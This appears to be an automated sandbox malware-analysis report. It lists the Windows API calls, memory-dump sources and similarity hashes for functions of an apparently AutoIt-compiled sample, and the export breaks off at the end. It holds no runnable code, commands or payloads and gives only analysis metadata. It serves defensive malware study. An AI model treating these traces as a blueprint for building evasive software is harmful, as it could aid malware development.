• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
• Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
• Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
• Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
APIs
• GetWindowRect.USER32(?,?), ref: 00458A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
• Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
• Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
• Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
APIs
• IsWindowVisible.USER32(?), ref: 0045B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
• _wcsstr.LIBCMT ref: 0045B289
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: e12d2d86149498a570dfe3d1f0cf3b012249e952dafe061ca34eaf36a442b0e2
• Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
• Opcode Fuzzy Hash: e12d2d86149498a570dfe3d1f0cf3b012249e952dafe061ca34eaf36a442b0e2
• Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• GetWindowLongW.USER32(?,000000F0), ref: 0048B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
• GetSystemMetrics.USER32(00000004), ref: 0048B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
• Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
• Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
• Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
• __itow.LIBCMT ref: 0045936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
• __itow.LIBCMT ref: 004593A3
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
• Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
• Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
• Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
• SelectObject.GDI32(?,00000000), ref: 0040135C
• BeginPath.GDI32(?), ref: 00401373
• SelectObject.GDI32(?,00000000), ref: 0040139C
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
• Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
• Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
• Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                                                                                  • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3824534824-0
                                                                                                                                                  • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                  • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                                                                                  • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                  • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,?,00AB15D8,00AB3CBB,?,00AB1D2A,?,?,00000000), ref: 00AB18E4
                                                                                                                                                  • _free.LIBCMT ref: 00AB1919
                                                                                                                                                  • _free.LIBCMT ref: 00AB1940
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AB1D2A,?,?,00000000), ref: 00AB194D
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AB1D2A,?,?,00000000), ref: 00AB1956
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                  • Opcode ID: bf34aa51ceded9156f041f0ad6d4ea0e8459ea396818d369f7725d0c84e5ea0e
                                                                                                                                                  • Instruction ID: 7cda99b2a0121abb051a14306539733df6a02655ea83380e5cf4a9ed58d4e1a1
                                                                                                                                                  • Opcode Fuzzy Hash: bf34aa51ceded9156f041f0ad6d4ea0e8459ea396818d369f7725d0c84e5ea0e
                                                                                                                                                  • Instruction Fuzzy Hash: C501F9362006417B9311B7B46DA9FEB266DABC6378BA10126F515E2263FE668D024251
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                                                                                  • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                  • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                  • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                                                                                  • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                  • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                                                                                  APIs
                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                  • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                  • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                                                                                  • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                  • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                                                                                  APIs
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                  • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                  • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                                                                                  • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                  • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00AB3189
                                                                                                                                                    • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
                                                                                                                                                    • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
                                                                                                                                                  • _free.LIBCMT ref: 00AB319B
                                                                                                                                                  • _free.LIBCMT ref: 00AB31AD
                                                                                                                                                  • _free.LIBCMT ref: 00AB31BF
                                                                                                                                                  • _free.LIBCMT ref: 00AB31D1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  APIs
                                                                                                                                                  • EndPath.GDI32(?), ref: 004013BF
                                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                                                                                  • DeleteObject.GDI32 ref: 00401401
                                                                                                                                                  • StrokePath.GDI32(?), ref: 0040141C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                                                                                  • __swprintf.LIBCMT ref: 00412ECD
                                                                                                                                                  Strings
                                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                                  APIs
                                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContainedObject
                                                                                                                                                  • String ID: AutoIt3GUI$Container$%I
                                                                                                                                                  • API String ID: 3565006973-4251005282
                                                                                                                                                  APIs
                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                                                                                    • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
